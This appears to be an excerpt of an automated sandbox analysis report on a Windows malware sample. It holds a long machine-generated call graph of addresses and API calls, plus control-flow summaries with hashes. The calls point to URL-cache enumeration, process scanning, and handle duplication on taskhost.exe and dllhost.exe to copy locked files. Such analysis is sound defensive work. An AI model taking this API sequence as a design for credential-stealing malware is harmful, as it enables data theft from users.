402cb3 38068->38069 38070 40b2cc 27 API calls 38069->38070 38071 402cd5 38070->38071 38072 40b2cc 27 API calls 38071->38072 38073 402cf0 38072->38073 38074 40b2cc 27 API calls 38073->38074 38075 402d0b 38074->38075 38076 40b2cc 27 API calls 38075->38076 38077 402d26 38076->38077 38078 40b2cc 27 API calls 38077->38078 38079 402d3e 38078->38079 38080 40b2cc 27 API calls 38079->38080 38081 402d59 38080->38081 38082 40b2cc 27 API calls 38081->38082 38083 402d78 38082->38083 38084 40b2cc 27 API calls 38083->38084 38085 402d93 38084->38085 38086 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38085->38086 
38086->37969 38087->37959 38091 40b58d 38088->38091 38090 40b2d1 38090->38033 38092 40b5a4 GetModuleHandleW FindResourceW 38091->38092 38093 40b62e 38091->38093 38094 40b5c2 LoadResource 38092->38094 38096 40b5e7 38092->38096 38093->38090 38095 40b5d0 SizeofResource LockResource 38094->38095 38094->38096 38095->38096 38096->38093 38104 40afcf 38096->38104 38098 40b608 memcpy 38107 40b4d3 memcpy 38098->38107 38100 40b61e 38108 40b3c1 18 API calls 38100->38108 38102 40b626 38109 40b04b 38102->38109 38105 40b04b ??3@YAXPAX 38104->38105 38106 40afd7 ??2@YAPAXI 38105->38106 38106->38098 38107->38100 38108->38102 38110 40b051 ??3@YAXPAX 38109->38110 38111 40b05f 38109->38111 38110->38111 38111->38093 38112->37977 38114 4032c4 38113->38114 38115 40b633 ??3@YAXPAX 38114->38115 38116 403316 38115->38116 38135 44553b 38116->38135 38120 403480 38333 40368c 15 API calls 38120->38333 38122 403489 38123 40b633 ??3@YAXPAX 38122->38123 38124 403495 38123->38124 38124->37979 38125 4033a9 memset memcpy 38126 4033ec wcscmp 38125->38126 38127 40333c 38125->38127 38126->38127 38127->38120 38127->38125 38127->38126 38331 4028e7 11 API calls 38127->38331 38332 40f508 6 API calls 38127->38332 38129 403421 _wcsicmp 38129->38127 38132 444a64 FreeLibrary 38131->38132 38133 444a83 38131->38133 38132->38133 38133->37979 38134->37980 38136 445548 38135->38136 38137 445599 38136->38137 38334 40c768 38136->38334 38138 4455a8 memset 38137->38138 38145 4457f2 38137->38145 38418 403988 38138->38418 38149 445854 38145->38149 38521 403e2d memset memset memset memset memset 38145->38521 38146 445672 38429 403fbe memset memset memset memset memset 38146->38429 38147 4458bb memset memset 38152 414c2e 17 API calls 38147->38152 38197 4458aa 38149->38197 38544 403c9c memset memset memset memset memset 38149->38544 38150 44595e memset memset 38156 414c2e 17 API calls 38150->38156 38151 4455e5 38151->38146 38159 44560f 38151->38159 38157 4458f9 38152->38157 38153 44557a 38194 44558c 38153->38194 38398 4136c0 
38153->38398 38155 445a00 memset memset 38166 414c2e 17 API calls 38155->38166 38167 44599c 38156->38167 38168 40b2cc 27 API calls 38157->38168 38171 4087b3 338 API calls 38159->38171 38161 445849 38612 40b1ab ??3@YAXPAX ??3@YAXPAX 38161->38612 38162 445bca 38169 445c8b memset memset 38162->38169 38236 445cf0 38162->38236 38163 445b38 memset memset memset 38174 445bd4 38163->38174 38175 445b98 38163->38175 38176 445a3e 38166->38176 38178 40b2cc 27 API calls 38167->38178 38170 445909 38168->38170 38182 414c2e 17 API calls 38169->38182 38179 409d1f 6 API calls 38170->38179 38180 445621 38171->38180 38173 44589f 38613 40b1ab ??3@YAXPAX ??3@YAXPAX 38173->38613 38567 414c2e 38174->38567 38175->38174 38184 445ba2 38175->38184 38187 40b2cc 27 API calls 38176->38187 38181 4459ac 38178->38181 38190 445919 38179->38190 38598 4454bf 20 API calls 38180->38598 38192 409d1f 6 API calls 38181->38192 38193 445cc9 38182->38193 38705 4099c6 wcslen 38184->38705 38185 4456b2 38600 40b1ab ??3@YAXPAX ??3@YAXPAX 38185->38600 38198 445a4f 38187->38198 38189 403335 38330 4452e5 45 API calls 38189->38330 38614 409b98 GetFileAttributesW 38190->38614 38191 445823 38191->38161 38204 4087b3 338 API calls 38191->38204 38206 4459bc 38192->38206 38207 409d1f 6 API calls 38193->38207 38402 444b06 38194->38402 38195 445879 38195->38173 38217 4087b3 338 API calls 38195->38217 38197->38147 38222 44594a 38197->38222 38210 409d1f 6 API calls 38198->38210 38201 445d3d 38221 40b2cc 27 API calls 38201->38221 38202 445d88 memset memset memset 38205 414c2e 17 API calls 38202->38205 38204->38191 38214 445dde 38205->38214 38681 409b98 GetFileAttributesW 38206->38681 38216 445ce1 38207->38216 38208 445bb3 38708 445403 memset 38208->38708 38209 445680 38209->38185 38452 4087b3 memset 38209->38452 38219 445a63 38210->38219 38211 40b2cc 27 API calls 38220 445bf3 38211->38220 38212 445928 38212->38222 38615 40b6ef 38212->38615 38223 40b2cc 27 API calls 38214->38223 38725 409b98 GetFileAttributesW 38216->38725 
38217->38195 38228 40b2cc 27 API calls 38219->38228 38583 409d1f wcslen wcslen 38220->38583 38231 445d54 _wcsicmp 38221->38231 38222->38150 38235 4459ed 38222->38235 38234 445def 38223->38234 38224 4459cb 38224->38235 38245 40b6ef 253 API calls 38224->38245 38238 445a94 38228->38238 38242 445d71 38231->38242 38308 445d67 38231->38308 38233 445665 38599 40b1ab ??3@YAXPAX ??3@YAXPAX 38233->38599 38243 409d1f 6 API calls 38234->38243 38235->38155 38278 445b22 38235->38278 38236->38189 38236->38201 38236->38202 38237 445389 259 API calls 38237->38162 38682 40ae18 38238->38682 38239 44566d 38239->38145 38503 413d4c 38239->38503 38726 445093 23 API calls 38242->38726 38251 445e03 38243->38251 38245->38235 38247 4456d8 38252 40b2cc 27 API calls 38247->38252 38250 44563c 38250->38233 38255 4087b3 338 API calls 38250->38255 38727 409b98 GetFileAttributesW 38251->38727 38258 4456e2 38252->38258 38253 40b2cc 27 API calls 38259 445c23 38253->38259 38254 445d83 38254->38189 38255->38250 38257 40b6ef 253 API calls 38257->38189 38601 413fa6 _wcsicmp _wcsicmp 38258->38601 38263 409d1f 6 API calls 38259->38263 38261 445e12 38268 445e6b 38261->38268 38274 40b2cc 27 API calls 38261->38274 38266 445c37 38263->38266 38264 445aa1 38267 445b17 38264->38267 38282 445ab2 memset 38264->38282 38296 409d1f 6 API calls 38264->38296 38304 445389 259 API calls 38264->38304 38689 40add4 38264->38689 38694 40ae51 38264->38694 38265 4456eb 38270 4456fd memset memset memset memset 38265->38270 38271 4457ea 38265->38271 38272 445389 259 API calls 38266->38272 38702 40aebe 38267->38702 38729 445093 23 API calls 38268->38729 38602 409c70 wcscpy wcsrchr 38270->38602 38605 413d29 38271->38605 38277 445c47 38272->38277 38279 445e33 38274->38279 38284 40b2cc 27 API calls 38277->38284 38278->38162 38278->38163 38285 409d1f 6 API calls 38279->38285 38281 445e7e 38286 445f67 38281->38286 38287 40b2cc 27 API calls 38282->38287 38289 445c53 38284->38289 38290 445e47 38285->38290 38291 40b2cc 27 API calls 
38286->38291 38287->38264 38288 409c70 2 API calls 38292 44577e 38288->38292 38293 409d1f 6 API calls 38289->38293 38728 409b98 GetFileAttributesW 38290->38728 38295 445f73 38291->38295 38297 409c70 2 API calls 38292->38297 38298 445c67 38293->38298 38300 409d1f 6 API calls 38295->38300 38296->38264 38301 44578d 38297->38301 38302 445389 259 API calls 38298->38302 38299 445e56 38299->38268 38305 445e83 memset 38299->38305 38303 445f87 38300->38303 38301->38271 38307 40b2cc 27 API calls 38301->38307 38302->38162 38732 409b98 GetFileAttributesW 38303->38732 38304->38264 38309 40b2cc 27 API calls 38305->38309 38311 4457a8 38307->38311 38308->38189 38308->38257 38310 445eab 38309->38310 38312 409d1f 6 API calls 38310->38312 38313 409d1f 6 API calls 38311->38313 38314 445ebf 38312->38314 38315 4457b8 38313->38315 38316 40ae18 9 API calls 38314->38316 38604 409b98 GetFileAttributesW 38315->38604 38326 445ef5 38316->38326 38318 4457c7 38318->38271 38320 4087b3 338 API calls 38318->38320 38319 40ae51 9 API calls 38319->38326 38320->38271 38321 445f5c 38323 40aebe FindClose 38321->38323 38322 40add4 2 API calls 38322->38326 38323->38286 38324 40b2cc 27 API calls 38324->38326 38325 409d1f 6 API calls 38325->38326 38326->38319 38326->38321 38326->38322 38326->38324 38326->38325 38328 445f3a 38326->38328 38730 409b98 GetFileAttributesW 38326->38730 38731 445093 23 API calls 38328->38731 38330->38127 38331->38129 38332->38127 38333->38122 38335 40c775 38334->38335 38733 40b1ab ??3@YAXPAX ??3@YAXPAX 38335->38733 38337 40c788 38734 40b1ab ??3@YAXPAX ??3@YAXPAX 38337->38734 38339 40c790 38735 40b1ab ??3@YAXPAX ??3@YAXPAX 38339->38735 38341 40c798 38342 40aa04 ??3@YAXPAX 38341->38342 38343 40c7a0 38342->38343 38736 40c274 memset 38343->38736 38348 40a8ab 9 API calls 38349 40c7c3 38348->38349 38350 40a8ab 9 API calls 38349->38350 38351 40c7d0 38350->38351 38765 40c3c3 38351->38765 38355 40c877 38364 40bdb0 38355->38364 38356 40c86c 38793 4053fe 39 API calls 38356->38793 38359 40c813 
_wcslwr 38791 40c634 50 API calls 38359->38791 38361 40c829 wcslen 38362 40c7e5 38361->38362 38362->38355 38362->38356 38790 40a706 wcslen memcpy 38362->38790 38792 40c634 50 API calls 38362->38792 38954 404363 38364->38954 38366 40bf5d 38974 40440c 38366->38974 38370 40b2cc 27 API calls 38371 40be02 wcslen 38370->38371 38371->38366 38374 40be1e 38371->38374 38372 40be26 _wcsncoll 38372->38374 38374->38366 38374->38372 38376 40be7d memset 38374->38376 38377 40bea7 memcpy 38374->38377 38378 40bf11 wcschr 38374->38378 38379 40b2cc 27 API calls 38374->38379 38381 40bf43 LocalFree 38374->38381 38977 40bd5d 28 API calls 38374->38977 38978 404423 38374->38978 38376->38374 38376->38377 38377->38374 38377->38378 38378->38374 38380 40bef6 _wcsnicmp 38379->38380 38380->38374 38380->38378 38381->38374 38382 4135f7 38993 4135e0 38382->38993 38385 40b2cc 27 API calls 38386 41360d 38385->38386 38387 40a804 8 API calls 38386->38387 38388 413613 38387->38388 38389 41363e 38388->38389 38390 40b273 27 API calls 38388->38390 38391 4135e0 FreeLibrary 38389->38391 38392 413625 GetProcAddress 38390->38392 38393 413643 38391->38393 38392->38389 38394 413648 38392->38394 38393->38153 38395 413658 38394->38395 38396 4135e0 FreeLibrary 38394->38396 38395->38153 38397 413666 38396->38397 38397->38153 38400 4136e2 38398->38400 38399 413827 38597 41366b FreeLibrary 38399->38597 38400->38399 38401 4137ac CoTaskMemFree 38400->38401 38401->38400 38996 4449b9 38402->38996 38405 444c1f 38405->38137 38406 4449b9 42 API calls 38408 444b4b 38406->38408 38407 444c15 38410 4449b9 42 API calls 38407->38410 38408->38407 39017 444972 GetVersionExW 38408->39017 38410->38405 38411 444b99 memcmp 38416 444b8c 38411->38416 38412 444c0b 39021 444a85 42 API calls 38412->39021 38416->38411 38416->38412 39018 444aa5 42 API calls 38416->39018 39019 40a7a0 GetVersionExW 38416->39019 39020 444a85 42 API calls 38416->39020 38419 40399d 38418->38419 39022 403a16 38419->39022 38421 403a09 39036 40b1ab ??3@YAXPAX 
??3@YAXPAX 38421->39036 38423 4039a3 38423->38421 38427 4039f4 38423->38427 39033 40a02c CreateFileW 38423->39033 38424 403a12 wcsrchr 38424->38151 38427->38421 38428 4099c6 2 API calls 38427->38428 38428->38421 38430 414c2e 17 API calls 38429->38430 38431 404048 38430->38431 38432 414c2e 17 API calls 38431->38432 38433 404056 38432->38433 38434 409d1f 6 API calls 38433->38434 38435 404073 38434->38435 38436 409d1f 6 API calls 38435->38436 38437 40408e 38436->38437 38438 409d1f 6 API calls 38437->38438 38439 4040a6 38438->38439 38440 403af5 20 API calls 38439->38440 38441 4040ba 38440->38441 38442 403af5 20 API calls 38441->38442 38443 4040cb 38442->38443 39063 40414f memset 38443->39063 38445 404140 39077 40b1ab ??3@YAXPAX ??3@YAXPAX 38445->39077 38447 4040ec memset 38450 4040e0 38447->38450 38448 404148 38448->38209 38449 4099c6 2 API calls 38449->38450 38450->38445 38450->38447 38450->38449 38451 40a8ab 9 API calls 38450->38451 38451->38450 39090 40a6e6 WideCharToMultiByte 38452->39090 38454 4087ed 39091 4095d9 memset 38454->39091 38457 408953 38457->38209 38458 408809 memset memset memset memset memset 38459 40b2cc 27 API calls 38458->38459 38460 4088a1 38459->38460 38461 409d1f 6 API calls 38460->38461 38462 4088b1 38461->38462 38463 40b2cc 27 API calls 38462->38463 38464 4088c0 38463->38464 38465 409d1f 6 API calls 38464->38465 38466 4088d0 38465->38466 38467 40b2cc 27 API calls 38466->38467 38468 4088df 38467->38468 38469 409d1f 6 API calls 38468->38469 38470 4088ef 38469->38470 38471 40b2cc 27 API calls 38470->38471 38472 4088fe 38471->38472 38473 409d1f 6 API calls 38472->38473 38474 40890e 38473->38474 38475 40b2cc 27 API calls 38474->38475 38476 40891d 38475->38476 38477 409d1f 6 API calls 38476->38477 38478 40892d 38477->38478 38504 40b633 ??3@YAXPAX 38503->38504 38505 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38504->38505 38506 413f00 Process32NextW 38505->38506 38507 413da5 OpenProcess 38506->38507 38508 413f17 CloseHandle 38506->38508 
38509 413eb0 38507->38509 38510 413df3 memset 38507->38510 38508->38247 38509->38506 38512 413ebf ??3@YAXPAX 38509->38512 38513 4099f4 3 API calls 38509->38513 39140 413f27 38510->39140 38512->38509 38513->38509 38514 413e37 GetModuleHandleW 38516 413e46 GetProcAddress 38514->38516 38518 413e1f 38514->38518 38516->38518 38517 413e6a QueryFullProcessImageNameW 38517->38518 38518->38514 38518->38517 39145 413959 38518->39145 39161 413ca4 38518->39161 38520 413ea2 CloseHandle 38520->38509 38522 414c2e 17 API calls 38521->38522 38523 403eb7 38522->38523 38524 414c2e 17 API calls 38523->38524 38525 403ec5 38524->38525 38526 409d1f 6 API calls 38525->38526 38527 403ee2 38526->38527 38528 409d1f 6 API calls 38527->38528 38529 403efd 38528->38529 38530 409d1f 6 API calls 38529->38530 38531 403f15 38530->38531 38532 403af5 20 API calls 38531->38532 38533 403f29 38532->38533 38534 403af5 20 API calls 38533->38534 38535 403f3a 38534->38535 38536 40414f 33 API calls 38535->38536 38537 403f4f 38536->38537 38538 403faf 38537->38538 38539 403f5b memset 38537->38539 38542 4099c6 2 API calls 38537->38542 38543 40a8ab 9 API calls 38537->38543 39175 40b1ab ??3@YAXPAX ??3@YAXPAX 38538->39175 38539->38537 38541 403fb7 38541->38191 38542->38537 38543->38537 38545 414c2e 17 API calls 38544->38545 38546 403d26 38545->38546 38547 414c2e 17 API calls 38546->38547 38548 403d34 38547->38548 38549 409d1f 6 API calls 38548->38549 38550 403d51 38549->38550 38551 409d1f 6 API calls 38550->38551 38552 403d6c 38551->38552 38553 409d1f 6 API calls 38552->38553 38554 403d84 38553->38554 38555 403af5 20 API calls 38554->38555 38556 403d98 38555->38556 38557 403af5 20 API calls 38556->38557 38558 403da9 38557->38558 38559 40414f 33 API calls 38558->38559 38564 403dbe 38559->38564 38560 403e1e 39176 40b1ab ??3@YAXPAX ??3@YAXPAX 38560->39176 38562 403dca memset 38562->38564 38563 403e26 38563->38195 38564->38560 38564->38562 38565 4099c6 2 API calls 38564->38565 38566 40a8ab 9 API calls 38564->38566 
38565->38564 38566->38564 38568 414b81 9 API calls 38567->38568 38569 414c40 38568->38569 38570 414c73 memset 38569->38570 39177 409cea 38569->39177 38571 414c94 38570->38571 39180 414592 RegOpenKeyExW 38571->39180 38575 414c64 SHGetSpecialFolderPathW 38576 414d0b 38575->38576 38576->38211 38577 414cc1 38578 414cf4 wcscpy 38577->38578 39181 414bb0 wcscpy 38577->39181 38578->38576 38580 414cd2 39182 4145ac RegQueryValueExW 38580->39182 38582 414ce9 RegCloseKey 38582->38578 38584 409d62 38583->38584 38585 409d43 wcscpy 38583->38585 38588 445389 38584->38588 38586 409719 2 API calls 38585->38586 38587 409d51 wcscat 38586->38587 38587->38584 38589 40ae18 9 API calls 38588->38589 38595 4453c4 38589->38595 38590 40ae51 9 API calls 38590->38595 38591 4453f3 38593 40aebe FindClose 38591->38593 38592 40add4 2 API calls 38592->38595 38594 4453fe 38593->38594 38594->38253 38595->38590 38595->38591 38595->38592 38596 445403 254 API calls 38595->38596 38596->38595 38597->38194 38598->38250 38599->38239 38600->38239 38601->38265 38603 409c89 38602->38603 38603->38288 38604->38318 38606 413d39 38605->38606 38607 413d2f FreeLibrary 38605->38607 38608 40b633 ??3@YAXPAX 38606->38608 38607->38606 38609 413d42 38608->38609 38610 40b633 ??3@YAXPAX 38609->38610 38611 413d4a 38610->38611 38611->38145 38612->38149 38613->38197 38614->38212 38616 44db70 38615->38616 38617 40b6fc memset 38616->38617 38618 409c70 2 API calls 38617->38618 38619 40b732 wcsrchr 38618->38619 38620 40b743 38619->38620 38621 40b746 memset 38619->38621 38620->38621 38622 40b2cc 27 API calls 38621->38622 38623 40b76f 38622->38623 38624 409d1f 6 API calls 38623->38624 38625 40b783 38624->38625 39183 409b98 GetFileAttributesW 38625->39183 38627 40b792 38628 40b7c2 38627->38628 38629 409c70 2 API calls 38627->38629 39184 40bb98 38628->39184 38631 40b7a5 38629->38631 38633 40b2cc 27 API calls 38631->38633 38636 40b7b2 38633->38636 38634 40b837 CloseHandle 38638 40b83e memset 38634->38638 38635 40b817 39267 409a45 
GetTempPathW 38635->39267 38639 409d1f 6 API calls 38636->38639 39217 40a6e6 WideCharToMultiByte 38638->39217 38639->38628 38640 40b827 CopyFileW 38640->38638 38642 40b866 39218 444432 38642->39218 38645 40bad5 38647 40baeb 38645->38647 38648 40bade DeleteFileW 38645->38648 38646 40b273 27 API calls 38649 40b89a 38646->38649 38650 40b04b ??3@YAXPAX 38647->38650 38648->38647 39264 438552 38649->39264 38652 40baf3 38650->38652 38652->38222 38654 40bacd 39298 443d90 111 API calls 38654->39298 38657 40bac6 39297 424f26 123 API calls 38657->39297 38658 40b8bd memset 39288 425413 17 API calls 38658->39288 38661 425413 17 API calls 38678 40b8b8 38661->38678 38664 40a71b MultiByteToWideChar 38664->38678 38667 40b9b5 memcmp 38667->38678 38668 4099c6 2 API calls 38668->38678 38669 404423 38 API calls 38669->38678 38672 40bb3e memset memcpy 39299 40a734 MultiByteToWideChar 38672->39299 38673 4251c4 137 API calls 38673->38678 38675 40bb88 LocalFree 38675->38678 38678->38657 38678->38658 38678->38661 38678->38664 38678->38667 38678->38668 38678->38669 38678->38672 38678->38673 38679 40ba5f memcmp 38678->38679 38680 40a734 MultiByteToWideChar 38678->38680 39289 4253ef 16 API calls 38678->39289 39290 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38678->39290 39291 4253af 17 API calls 38678->39291 39292 4253cf 17 API calls 38678->39292 39293 447280 memset 38678->39293 39294 447960 memset memcpy memcpy memcpy 38678->39294 39295 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38678->39295 39296 447920 memcpy memcpy memcpy 38678->39296 38679->38678 38680->38678 38681->38224 38683 40aebe FindClose 38682->38683 38684 40ae21 38683->38684 38685 4099c6 2 API calls 38684->38685 38686 40ae35 38685->38686 38687 409d1f 6 API calls 38686->38687 38688 40ae49 38687->38688 38688->38264 38690 40ade0 38689->38690 38691 40ae0f 38689->38691 38690->38691 38692 40ade7 wcscmp 38690->38692 38691->38264 38692->38691 38693 40adfe wcscmp 38692->38693 38693->38691 38695 40ae7b FindNextFileW 38694->38695 38696 
40ae5c FindFirstFileW 38694->38696 38697 40ae94 38695->38697 38698 40ae8f 38695->38698 38696->38697 38699 409d1f 6 API calls 38697->38699 38701 40aeb6 38697->38701 38700 40aebe FindClose 38698->38700 38699->38701 38700->38697 38701->38264 38703 40aed1 38702->38703 38704 40aec7 FindClose 38702->38704 38703->38278 38704->38703 38706 4099d7 38705->38706 38707 4099da memcpy 38705->38707 38706->38707 38707->38208 38709 40b2cc 27 API calls 38708->38709 38710 44543f 38709->38710 38711 409d1f 6 API calls 38710->38711 38712 44544f 38711->38712 39657 409b98 GetFileAttributesW 38712->39657 38714 445476 38717 40b2cc 27 API calls 38714->38717 38715 44545e 38715->38714 38716 40b6ef 253 API calls 38715->38716 38716->38714 38718 445482 38717->38718 38719 409d1f 6 API calls 38718->38719 38720 445492 38719->38720 39658 409b98 GetFileAttributesW 38720->39658 38722 4454a1 38723 4454b9 38722->38723 38724 40b6ef 253 API calls 38722->38724 38723->38237 38724->38723 38725->38236 38726->38254 38727->38261 38728->38299 38729->38281 38730->38326 38731->38326 38732->38308 38733->38337 38734->38339 38735->38341 38737 414c2e 17 API calls 38736->38737 38738 40c2ae 38737->38738 38794 40c1d3 38738->38794 38743 40c3be 38760 40a8ab 38743->38760 38744 40afcf 2 API calls 38745 40c2fd FindFirstUrlCacheEntryW 38744->38745 38746 40c3b6 38745->38746 38747 40c31e wcschr 38745->38747 38748 40b04b ??3@YAXPAX 38746->38748 38749 40c331 38747->38749 38750 40c35e FindNextUrlCacheEntryW 38747->38750 38748->38743 38751 40a8ab 9 API calls 38749->38751 38750->38747 38752 40c373 GetLastError 38750->38752 38755 40c33e wcschr 38751->38755 38753 40c3ad FindCloseUrlCache 38752->38753 38754 40c37e 38752->38754 38753->38746 38756 40afcf 2 API calls 38754->38756 38755->38750 38757 40c34f 38755->38757 38758 40c391 FindNextUrlCacheEntryW 38756->38758 38759 40a8ab 9 API calls 38757->38759 38758->38747 38758->38753 38759->38750 38888 40a97a 38760->38888 38763 40a8cc 38763->38348 38764 40a8d0 7 API calls 38764->38763 38893 
40b1ab ??3@YAXPAX ??3@YAXPAX 38765->38893 38767 40c3dd 38768 40b2cc 27 API calls 38767->38768 38769 40c3e7 38768->38769 38894 414592 RegOpenKeyExW 38769->38894 38771 40c3f4 38772 40c50e 38771->38772 38773 40c3ff 38771->38773 38787 405337 38772->38787 38774 40a9ce 4 API calls 38773->38774 38775 40c418 memset 38774->38775 38895 40aa1d 38775->38895 38778 40c471 38780 40c47a _wcsupr 38778->38780 38779 40c505 RegCloseKey 38779->38772 38781 40a8d0 7 API calls 38780->38781 38782 40c498 38781->38782 38783 40a8d0 7 API calls 38782->38783 38784 40c4ac memset 38783->38784 38785 40aa1d 38784->38785 38786 40c4e4 RegEnumValueW 38785->38786 38786->38779 38786->38780 38897 405220 38787->38897 38790->38359 38791->38361 38792->38362 38793->38355 38795 40ae18 9 API calls 38794->38795 38801 40c210 38795->38801 38796 40ae51 9 API calls 38796->38801 38797 40c264 38798 40aebe FindClose 38797->38798 38800 40c26f 38798->38800 38799 40add4 2 API calls 38799->38801 38806 40e5ed memset memset 38800->38806 38801->38796 38801->38797 38801->38799 38802 40c231 _wcsicmp 38801->38802 38803 40c1d3 35 API calls 38801->38803 38802->38801 38804 40c248 38802->38804 38803->38801 38819 40c084 22 API calls 38804->38819 38807 414c2e 17 API calls 38806->38807 38808 40e63f 38807->38808 38809 409d1f 6 API calls 38808->38809 38810 40e658 38809->38810 38820 409b98 GetFileAttributesW 38810->38820 38812 40e667 38813 40e680 38812->38813 38815 409d1f 6 API calls 38812->38815 38821 409b98 GetFileAttributesW 38813->38821 38815->38813 38816 40e68f 38818 40c2d8 38816->38818 38822 40e4b2 38816->38822 38818->38743 38818->38744 38819->38801 38820->38812 38821->38816 38843 40e01e 38822->38843 38824 40e593 38825 40e5b0 38824->38825 38826 40e59c DeleteFileW 38824->38826 38828 40b04b ??3@YAXPAX 38825->38828 38826->38825 38827 40e521 38827->38824 38866 40e175 38827->38866 38829 40e5bb 38828->38829 38831 40e5c4 CloseHandle 38829->38831 38832 40e5cc 38829->38832 38831->38832 38834 40b633 ??3@YAXPAX 38832->38834 38833 40e573 38836 
40e584 38833->38836 38837 40e57c CloseHandle 38833->38837 38835 40e5db 38834->38835 38840 40b633 ??3@YAXPAX 38835->38840 38887 40b1ab ??3@YAXPAX ??3@YAXPAX 38836->38887 38837->38836 38839 40e540 38839->38833 38886 40e2ab 30 API calls 38839->38886 38841 40e5e3 38840->38841 38841->38818 38844 406214 22 API calls 38843->38844 38845 40e03c 38844->38845 38846 40e16b 38845->38846 38847 40dd85 75 API calls 38845->38847 38846->38827 38848 40e06b 38847->38848 38848->38846 38849 40afcf ??2@YAPAXI ??3@YAXPAX 38848->38849 38850 40e08d OpenProcess 38849->38850 38851 40e0a4 GetCurrentProcess DuplicateHandle 38850->38851 38855 40e152 38850->38855 38852 40e0d0 GetFileSize 38851->38852 38853 40e14a CloseHandle 38851->38853 38856 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 38852->38856 38853->38855 38854 40e160 38858 40b04b ??3@YAXPAX 38854->38858 38855->38854 38857 406214 22 API calls 38855->38857 38859 40e0ea 38856->38859 38857->38854 38858->38846 38860 4096dc CreateFileW 38859->38860 38861 40e0f1 CreateFileMappingW 38860->38861 38862 40e140 CloseHandle CloseHandle 38861->38862 38863 40e10b MapViewOfFile 38861->38863 38862->38853 38864 40e13b CloseHandle 38863->38864 38865 40e11f WriteFile UnmapViewOfFile 38863->38865 38864->38862 38865->38864 38867 40e18c 38866->38867 38868 406b90 11 API calls 38867->38868 38869 40e19f 38868->38869 38870 40e1a7 memset 38869->38870 38871 40e299 38869->38871 38876 40e1e8 38870->38876 38872 4069a3 ??3@YAXPAX ??3@YAXPAX 38871->38872 38873 40e2a4 38872->38873 38873->38839 38874 406e8f 13 API calls 38874->38876 38875 406b53 SetFilePointerEx ReadFile 38875->38876 38876->38874 38876->38875 38877 40e283 38876->38877 38878 40dd50 _wcsicmp 38876->38878 38882 40742e 8 API calls 38876->38882 38883 40aae3 wcslen wcslen _memicmp 38876->38883 38884 40e244 _snwprintf 38876->38884 38879 40e291 38877->38879 38880 40e288 ??3@YAXPAX 38877->38880 38878->38876 38881 40aa04 ??3@YAXPAX 38879->38881 38880->38879 38881->38871 38882->38876 38883->38876 38885 

                          Control-flow Graph

                          APIs
                          • memset.MSVCRT ref: 0040DDAD
                            • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                          • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 0040DDD4
                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                            • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation,?,000000FF,00000000,00000104), ref: 00413559
                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver,?,000000FF,00000000,00000104), ref: 0041356B
                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver,?,000000FF,00000000,00000104), ref: 0041357D
                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject,?,000000FF,00000000,00000104), ref: 0041358F
                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject,?,000000FF,00000000,00000104), ref: 004135A1
                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject,?,000000FF,00000000,00000104), ref: 004135B3
                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess,?,000000FF,00000000,00000104), ref: 004135C5
                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess,?,000000FF,00000000,00000104), ref: 004135D7
                          • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                          • CloseHandle.KERNELBASE(C0000004), ref: 0040DE3E
                          • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                          • _wcsicmp.MSVCRT ref: 0040DEB2
                          • _wcsicmp.MSVCRT ref: 0040DEC5
                          • _wcsicmp.MSVCRT ref: 0040DED8
                          • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                          • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                          • DuplicateHandle.KERNEL32(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                          • memset.MSVCRT ref: 0040DF5F
                          • CloseHandle.KERNEL32(C0000004), ref: 0040DF92
                          • _wcsicmp.MSVCRT ref: 0040DFB2
                          • CloseHandle.KERNEL32(00000104), ref: 0040DFF2
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                          • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                          • API String ID: 708747863-3398334509
                          • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                          • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                          • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                          • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58

                          Control-flow Graph

                          APIs
                            • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
                          • memset.MSVCRT ref: 00413D7F
                          • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
